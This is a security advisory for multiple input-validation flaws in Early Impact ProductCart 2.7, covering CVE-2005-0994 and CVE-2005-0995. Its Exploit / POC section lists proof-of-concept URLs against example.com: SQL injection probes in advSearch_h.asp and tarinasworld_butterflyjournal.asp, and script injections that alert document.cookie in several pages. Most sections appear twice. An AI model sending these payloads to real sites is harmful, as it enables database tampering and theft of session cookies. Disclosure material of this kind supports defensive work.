Early Impact ProductCart Multiple Input Validation Vulnerabilities
BID:12990
Info
Early Impact ProductCart Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 12990 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0994 CVE-2005-0995 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 04 2005 12:00AM |
| Updated: | Jul 12 2009 11:56AM |
| Credit: | Discovery of these issues is credited to diabolical crab <[email protected]>. |
| Vulnerable: |
Early Impact ProductCart 2.7 |
| Not Vulnerable: | |
Discussion
Early Impact ProductCart Multiple Input Validation Vulnerabilities
Multiple input validation vulnerabilities reportedly affect Early Impact ProductCart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
The first set of issues are cross-site scripting vulnerabilities that affect the 'NewCust.asp' script, the 'storelocator_submit.asp' script, the 'techErr.asp' script, and the 'advSearch_h.asp' script.
These issues arise as the application fails to properly sanitize input passed through the offending functions before including it in dynamically generated Web content.
The second set of issues are SQL injection vulnerabilities that affect the 'advSearch_h.asp' script and the 'tarinasworld_butterflyjournal.asp' script. The application includes the value of the offending parameters without sanitization, allowing an attacker to inject SQL syntax and manipulate SQL queries.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Multiple input validation vulnerabilities reportedly affect Early Impact ProductCart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
The first set of issues are cross-site scripting vulnerabilities that affect the 'NewCust.asp' script, the 'storelocator_submit.asp' script, the 'techErr.asp' script, and the 'advSearch_h.asp' script.
These issues arise as the application fails to properly sanitize input passed through the offending functions before including it in dynamically generated Web content.
The second set of issues are SQL injection vulnerabilities that affect the 'advSearch_h.asp' script and the 'tarinasworld_butterflyjournal.asp' script. The application includes the value of the offending parameters without sanitization, allowing an attacker to inject SQL syntax and manipulate SQL queries.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Exploit / POC
Early Impact ProductCart Multiple Input Validation Vulnerabilities
The following examples are available:
SQL:
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory='SQL_ERROR&idSupplier=10&resultCnt=999&keyword=dcrab
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt='SQL_ERROR&keyword=dcrab
http://www.example.com/tarinasworld_butterflyjournal.asp?offset='SQL_INJECTION
XSS:
http://www.example.com/productcart/pc/NewCust.asp?redirectUrl=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/storelocator_submit.asp?countrysearch=1&country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/productcart/pc/techErr.asp?error=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt=999&keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
The following examples are available:
SQL:
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory='SQL_ERROR&idSupplier=10&resultCnt=999&keyword=dcrab
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt='SQL_ERROR&keyword=dcrab
http://www.example.com/tarinasworld_butterflyjournal.asp?offset='SQL_INJECTION
XSS:
http://www.example.com/productcart/pc/NewCust.asp?redirectUrl=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/storelocator_submit.asp?countrysearch=1&country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/productcart/pc/techErr.asp?error=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://www.example.com/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt=999&keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Solution / Fix
Early Impact ProductCart Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Early Impact ProductCart Multiple Input Validation Vulnerabilities
References:
References:
- ProductCart Homepage (Early Impact)